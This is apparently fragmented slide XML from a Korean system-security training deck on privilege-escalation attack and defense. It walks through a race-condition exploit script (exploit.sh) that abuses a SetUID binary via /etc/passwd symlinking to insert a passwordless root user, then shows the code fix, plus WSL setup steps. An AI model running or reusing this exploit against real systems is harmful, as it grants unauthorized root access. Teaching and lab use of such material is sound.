            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>va_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=2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ASLR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>pass </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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이를 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insertid::0:0:root/root:/bin/bash</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Condition</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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ls –l createTempFile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/sec/createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vim createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</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/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./createTempFile Test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile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ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 인자로 넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 추가됨을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4) /sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vim /sec/exploit.sh</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>C</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 권한 부여</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> 755 /sec/exploit.sh</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6) /sec/exploit.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>실행 및 권한 상승을 통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 조작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/exploit.sh </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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 /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>sh</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old=`ls -l /etc/passwd`</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new=`ls -l /etc/passwd`</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new=`ls -l /etc/passwd`</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insertid::0:0:root/root:/bin/bash &amp;</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ls -s /etc/passwd /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="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&amp;</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"STOP... The passwd file has ben changed"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insertid::0:0:root/root:/bin/bash” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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ls -l /etc/passwd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 /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>sh</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old=`ls -l /etc/passwd`</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new=`ls -l /etc/passwd`</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new=`ls -l /etc/passwd`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설치를 완료하였다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 다시 컴퓨터 좌측 하단의 돋보기에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 권한으로 터미널을 실행</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:Microsoft-Windows-Subsystem-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:VirtualMachinePlatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="9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5. 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>재부팅 후 마이크로소프트 스토어를 켜서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>우분투를 설치해준다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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설치가 완료되면 스토어에서 실행 버튼을 누른다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“Installing, this may take a few minutes…” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 줄이 나올 때 까지 기다린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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ls -l /etc/passwd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/bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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old=`ls -l /etc/passwd`</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new=`ls -l /etc/passwd`</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 "$old" == "$new" ]; do</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new=`ls -l /etc/passwd`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ln)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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switching)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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좌측</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 /</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root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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우측</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mn-ea"/>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생성된다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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>이다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 /sec/createTempFile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해당 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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>. /sec/createTempFile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root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 /sec/createTempFile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함수에 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(insertid::0:0:root/root:/bin/bash)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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좌측</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 /sec/createTempFile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root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 /</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root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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우측</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 /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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root </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:t>1) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/12</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>권한상승 공격 및 방어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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존재한다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하지만 해당 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Condition </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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setUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> u-s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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Condition</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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리 이동 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cd /sec</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /sec/createTempFile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createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 코드 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>삭제 후 다시 파일을 추가하는 취약점으로 권한 상승에 이용될 수 있음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>취약한 부분 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>remove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>제거 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>fopen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>옵션 변경</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>재빌드</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –o createTempFile createTempFile.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a: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SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>부여</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>u+s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> createTempFile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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endParaRPr lang="ko-KR" altLang="en-US" sz="100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터미널 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) ifconfig </a:t>
            </a:r>
            <a:r>
